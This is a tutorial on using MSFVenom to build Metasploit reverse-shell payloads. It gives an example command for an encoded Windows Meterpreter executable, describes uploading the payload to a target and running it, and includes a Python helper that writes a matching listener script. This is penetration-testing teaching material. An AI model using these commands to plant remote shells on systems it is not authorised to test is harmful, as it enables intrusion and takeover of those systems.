MSFVenom

What is MSFVenom?

MSFVenom combines Msfpayload and Msfencode into a single tool within the Metasploit Framework. It replaced both msfpayload and msfencode as of June 8th, 2015.

MSFVenom is used to create payloads in a much more manual way than using modules in the Metasploit Framework. The MSFVenom process lets the attacker see the code used for the attack in far more detail, along with giving a more refined choice of target platform.

Using MSFVenom

MSFVenom can be a bit fiddly if you have never used the tool before; however, it breaks down into two simple steps:

  1. Create a listener
  2. Create your payload with MSFVenom

What is a listener?

A listener waits for the payload to call back home, which is your machine. This is referred to as catching the payload, and it gives you a connection to the target host. You must have a listener running for the payload to connect back to; there are several kinds of listener you can use:

  • Netcat Listener
  • Metasploit Listener
  • Python scripts

Creating The MSFVenom Payload

Creating the payload is the core of MSFVenom, so understanding the format of the command is incredibly useful. The general form is:

  • msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP> LPORT=<PORT>

How a completed command would look (encoder names are arch-qualified, and LHOST/LPORT must match the listener):

  • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 3 -f exe LHOST=<IP> LPORT=<PORT> > encoded.exe

-p: The payload appropriate to the target

-e: The encoding algorithm to apply to the payload

-i: The encode count (how many times the encoder is applied)

-f: The file type the payload will be output as

Once the relevant flags have been set and the payload generated, it will need to be delivered to the target in the correct way, whether through a file upload function or similar. After uploading the payload, it still has to be run on the target; this is crucial!

After running the payload you should see a change of state on the listener: either a Meterpreter session has been caught/initiated, or a standard bash shell has been caught via the likes of Netcat.
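The two steps above only work together when the listener is configured for the same payload, LHOST and LPORT that the payload was built with. The following Python helper is an added example, not code from the original page or from Metasploit: it parses an msfvenom command line, flags the common mistakes (a reverse payload without LHOST/LPORT, an encoder name missing its arch prefix), and emits the matching exploit/multi/handler resource script. The address 10.0.0.5 and port 4444 in the sample command are constructed values.

```python
import shlex

# Constructed sample: the page's completed command with made-up listener values.
SAMPLE_CMD = ("msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai "
              "-i 3 -f exe LHOST=10.0.0.5 LPORT=4444 > encoded.exe")

FLAGS = {"-p": "payload", "-e": "encoder", "-i": "iterations", "-f": "format"}

def parse_msfvenom(cmd):
    """Split an msfvenom command line into its flags and KEY=VALUE options."""
    argv = shlex.split(cmd)
    if not argv or argv[0] != "msfvenom":
        raise ValueError("not an msfvenom command")
    opts, params, i = {}, {}, 1
    while i < len(argv):
        tok = argv[i]
        if tok in FLAGS and i + 1 < len(argv):
            opts[FLAGS[tok]] = argv[i + 1]
            i += 2
        else:
            if "=" in tok:  # payload options such as LHOST=... / LPORT=...
                key, value = tok.split("=", 1)
                params[key.upper()] = value
            i += 1  # anything else (e.g. '> encoded.exe') is skipped
    return opts, params

def check_payload(opts, params):
    """Return the problems to fix before generating the payload (empty if none)."""
    problems = []
    for flag, name in (("-p", "payload"), ("-f", "format")):
        if name not in opts:
            problems.append(f"missing {flag} ({name})")
    payload = opts.get("payload", "")
    if "/reverse_" in payload:  # a reverse payload must know where the listener is
        for key in ("LHOST", "LPORT"):
            if key not in params:
                problems.append(f"{payload} needs {key} to reach the listener")
    if "encoder" in opts and "/" not in opts["encoder"]:
        problems.append("encoder names are arch-qualified, e.g. x86/shikata_ga_nai")
    if "iterations" in opts and not opts["iterations"].isdigit():
        problems.append("-i must be an integer encode count")
    return problems

def handler_rc(opts, params):
    """msfconsole resource script for a multi/handler that matches the payload."""
    lines = ["use exploit/multi/handler", f"set PAYLOAD {opts['payload']}"]
    lines += [f"set {k} {v}" for k, v in sorted(params.items())]
    lines.append("exploit -j")
    return "\n".join(lines)
```

Save the output of handler_rc to a file and load it with msfconsole -r to start the listener before the payload is executed.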